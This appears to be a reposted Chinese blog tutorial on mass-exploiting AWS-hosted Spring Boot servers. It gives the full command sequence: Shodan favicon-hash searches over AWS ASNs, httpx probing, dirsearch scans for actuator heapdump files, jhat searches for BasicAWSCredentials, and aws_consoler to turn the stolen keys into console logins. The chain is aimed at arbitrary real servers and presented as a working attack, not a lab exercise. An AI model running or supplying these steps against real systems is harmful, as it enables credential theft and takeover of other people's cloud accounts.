0x01 引言

?

全球云廠商有很多，本文主要針對(duì)Spring Boot信息泄露在aws上的利用。

0x02 正文

1) 用shodan分析spring boot服務(wù)器在asn上分布的情況

https://beta.shodan.io/search/facet?query=http.favicon.hash%3A116323821&facet=asn

aws的服務(wù)器主要分布在as16509和as14618。

2) 通過shodan命令行下載數(shù)據(jù)

as16509:

shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1

as14618:

shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -1

3) 通過httpx探測(cè)存活的url

shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt

4) 利用dirsearch掃描存在的heapdump文件

• 所用字典：

heapdump actuator/heapdump management/heapdump

• 掃描命令

python3 dirsearch.py -L as16509.txt -w wordlist.txt -e *

• 查看結(jié)果

cat reports/BATCH-21-03-1616-47-59/ | grep MB

5）利用jhat分析heapdump

jhat -port 7001 heapdump

主要通過以下關(guān)鍵詞來尋找憑證：

• 關(guān)鍵詞1: com.amazonaws.auth.BasicAWSCredentials

• 關(guān)鍵詞2 ：com.amazonaws.auth.BasicSessionCredentials

6）利用aws_consoler來偽造aws控制臺(tái)登陸憑證。憑證能否生成和所擁有的權(quán)限大小，取決于iam所分配的權(quán)限。

aws_consoler -v -a <accessKey> -s <secretKey>aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>

復(fù)制url到瀏覽器中執(zhí)行，成功登陸到AWS控制臺(tái)。

0x03 參考

https://github.com/NetSPI/aws_consoler
https://github.com/maurosoria/dirsearch
https://github.com/projectdiscovery/httpx
https://github.com/LandGrey/SpringBootVulExploit

總結(jié)

以上是生活随笔為你收集整理的从Spring Boot信息泄露到AWS控制台劫持（攻破aws亚马逊服务器）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。